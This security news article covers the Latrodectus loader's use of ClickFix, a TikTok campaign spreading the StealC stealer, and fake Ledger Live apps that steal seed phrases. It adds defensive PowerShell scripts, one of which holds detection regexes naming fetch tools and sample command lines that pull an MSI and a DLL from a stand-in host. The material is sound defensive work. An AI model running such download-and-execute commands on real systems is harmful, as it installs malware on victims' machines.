
The malware known as Latrodectus has become the latest to embrace the widely used social engineering technique called ClickFix as a distribution vector.
"The ClickFix technique is particularly risky as it allows malware to be executed in memory rather than being written to disk," Expel said in a report shared with The Hacker News. "It removes several opportunities for browsers or security tools to detect or block malware."
Latrodectus, believed to be the successor to IcedID, is the name given to a malware that serves as a downloader for other payloads, such as ransomware. It was first documented in April 2024 by Proofpoint and Team Cymru.
Incidentally, the malware is one of several malicious software families that were dealt an operational blow as part of Operation Endgame, which took down 300 servers worldwide and neutralized Bumblebee, Latrodectus, Qakbot, HijackLoader, granabot, DanaBot, and TrickBot between May 19 and 22, 2025.
In the latest set of Latrodectus attacks observed by Expel in May 2025, unsuspecting users are tricked into copying and executing a PowerShell command from an infected website, a strategy that has become a popular method of distributing a wide range of malware.
"When run by a user, these commands will attempt to install a file located at a remote URL using MSIEXEC, and then execute it in memory," Expel said. "This protects the attacker from writing a file to the computer and having it detected by a browser or an antivirus that could detect it on disk."
The MSI installer contains a legitimate application from NVIDIA, which is used to sideload a malicious DLL, which in turn uses curl to download the main payload.
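The behaviour Expel describes (a user pastes a command into the Run box, msiexec fetches a package from a remote URL, curl pulls the next stage) leaves a trace in Explorer's Win+R history, so a defender can review that history for the same patterns. The following script is an added example written for this article; it is not code from Expel or from The Hacker News, and the regular expressions, the sample entries and the helper names (`Test-ClickFixCommand`, `Get-RunMruHistory`) are my own assumptions modelled on the article's description rather than published indicators.

```powershell
# Added example, not from the article or from Expel's report. The regexes are
# assumptions modelled on the behaviour the article describes (msiexec pulling an
# MSI from a remote URL, PowerShell launched from the Run box); tune them locally.

function Test-ClickFixCommand {
    param([Parameter(Mandatory)][string]$CommandLine)
    $c = $CommandLine.Trim()
    $hasRemoteUrl = $c -match '\bhttps?://'
    # msiexec asked to install a package that lives on a web server
    $msiFromUrl = ($c -match '\bmsiexec(\.exe)?\b') -and $hasRemoteUrl
    # PowerShell with hiding, encoding, or download-and-run switches
    $psHidden = ($c -match '\b(powershell|pwsh)(\.exe)?\b') -and
                ($c -match '(-w(indowstyle)?\s+h(idden)?\b|-e(nc|ncodedcommand)?\s|\biex\b|invoke-expression|\birm\b|\biwr\b|invoke-webrequest|downloadstring)')
    # Native fetch tools pointed at a remote URL (the article's MSI stage uses curl)
    $fetchTool = ($c -match '\b(curl|certutil|bitsadmin|mshta)(\.exe)?\b') -and $hasRemoteUrl
    return [bool]($msiFromUrl -or $psHidden -or $fetchTool)
}

function Get-RunMruHistory {
    # Explorer keeps Win+R history here; MRUList gives the order (newest first),
    # and each entry carries a trailing "\1" that is stripped below.
    $key = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
    if (-not (Test-Path $key)) { return @() }
    $props = Get-ItemProperty -Path $key
    foreach ($ch in ([string]$props.MRUList).ToCharArray()) {
        $name = [string]$ch
        $raw  = [string]$props.$name
        if ($raw) { $raw -replace '\\1$', '' }
    }
}

# Constructed sample entries (not real captures) so the check can be exercised offline.
$sample = @(
    'powershell -w hidden -c "msiexec /i https://example-bad.invalid/update.msi /qn"',
    'notepad',
    'cmd /c curl -o %TEMP%\a.dll https://example-bad.invalid/a.dll',
    'mstsc'
)
$sample | ForEach-Object {
    [pscustomobject]@{ Suspicious = (Test-ClickFixCommand $_); Command = $_ }
} | Format-Table -AutoSize
# The first and third entries are flagged; notepad and mstsc are not.

# On a live host, review the real Run history the same way:
# Get-RunMruHistory | Where-Object { Test-ClickFixCommand $_ }
```

RunMRU only records what went through the Run dialog; a command pasted into a terminal that the user opened from the Start menu will not appear there, so pair this review with PowerShell script block logging (Event ID 4104) where it is enabled.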
To mitigate this type of attack, organizations are advised to disable the Windows Run program using Group Policy Objects (GPO) or to disable the "Windows + R" hotkey through a Windows Registry change.
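The registry change and the GPO the article recommends are the same control: the "Remove Run menu from Start Menu" policy sets a `NoRun` value under the Explorer policies key, and that value also disables the Win+R hotkey. The script below is an added example, not code from the article or from Expel; the function names are my own, and the claim that `NoRun` is what the GPO writes reflects my understanding of that policy rather than anything stated on the page.

```powershell
# Added example, not from the article or Expel. Applies the "Remove Run menu from
# Start Menu" policy by writing the NoRun value the GPO sets (assumption based on
# my understanding of that policy). Use an elevated session for the AllUsers scope.

function Set-RunDialogDisabled {
    param(
        [ValidateSet('CurrentUser', 'AllUsers')][string]$Scope = 'CurrentUser',
        [switch]$Revert
    )
    $hive = if ($Scope -eq 'AllUsers') { 'HKLM:' } else { 'HKCU:' }
    $key  = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    if ($Revert) {
        Remove-ItemProperty -Path $key -Name 'NoRun' -ErrorAction SilentlyContinue
    } else {
        New-ItemProperty -Path $key -Name 'NoRun' -Value 1 -PropertyType DWord -Force | Out-Null
    }
    # Explorer reads the policy at start-up; a log-off/log-on or an Explorer
    # restart is needed before the Run box and Win+R actually stop working.
    (Get-ItemProperty -Path $key -Name 'NoRun' -ErrorAction SilentlyContinue).NoRun
}

function Test-RunDialogDisabled {
    # Reports $true if either the machine or the user policy sets NoRun = 1.
    foreach ($hive in 'HKLM:', 'HKCU:') {
        $key = "$hive\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
        $v = (Get-ItemProperty -Path $key -Name 'NoRun' -ErrorAction SilentlyContinue).NoRun
        if ($v -eq 1) { return $true }
    }
    return $false
}

# Apply for the current user and confirm the value landed (returns 1, then $true).
Set-RunDialogDisabled -Scope CurrentUser
Test-RunDialogDisabled

# To undo: Set-RunDialogDisabled -Scope CurrentUser -Revert
```

This is a speed bump rather than a complete control: the policy removes the Run dialog and the Win+R shortcut, but a user who opens a terminal from the Start menu can still paste the same command there, so the logging and review described earlier in the article remain necessary.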
From ClickFix to TikTok
The disclosure comes as Trend Micro detailed a new social engineering campaign that, instead of relying on fake CAPTCHA pages, uses TikTok videos likely generated with artificial intelligence (AI) tools to direct users to run commands that distribute the StealC information stealer under the guise of activating Windows, Microsoft Office, CapCut, and Spotify.
These videos were posted from various TikTok accounts such as @gitallowed, @zane.hughton, @allaivo2, @sysglow.wow, @Alexfixpc, and @digitaldreams771. These accounts are no longer active. One of the videos, claiming to provide instructions to "instantly boost your Spotify experience," has collected around 500,000 views, with more than 20,000 likes and more than 100 comments.
The campaign marks a new evolution of ClickFix in which users looking for ways to activate pirated apps are verbally and visually guided to open the Windows Run dialog by pressing "Windows + R", launch PowerShell, and finally run the command highlighted in the video.
"Threat actors are now using TikTok videos that are potentially generated using AI-powered tools to socially engineer users into executing PowerShell commands under the guise of guiding them to activate legitimate software or unlock premium features," security researcher Junestherry Dela Cruz said.
"This campaign highlights how attackers are ready to weaponize whichever platforms are popular to distribute malware."
Fake Ledger apps used to steal seed phrases from Mac users
The findings also follow the discovery of four separate malware campaigns that take advantage of a cloned version of the Ledger Live app to steal sensitive data, including seed phrases, with the goal of draining victims' cryptocurrency wallets. The activity has been ongoing since August 2024.
The attacks use malicious DMG files which, when launched, run AppleScript to exfiltrate passwords and Apple Notes data, and then download a trojanized version of Ledger Live. Once the app is opened, it warns users of an alleged account problem and requests their seed phrase for recovery. The entered seed phrase is then sent to an attacker-controlled server.
Moonlock Lab, which highlighted the campaign, said the rogue apps use macOS stealer malware such as Atomic macOS Stealer (AMOS) and Odyssey, the latter of which introduced the novel phishing scheme in March 2025. It is worth noting that this activity overlaps with activity previously reported by Jamf.
"On dark web forums, chatter around anti-Ledger schemes is increasing. The next wave is already taking shape," Moonlock Lab said. "Hackers will continue to exploit the trust crypto owners place in Ledger Live."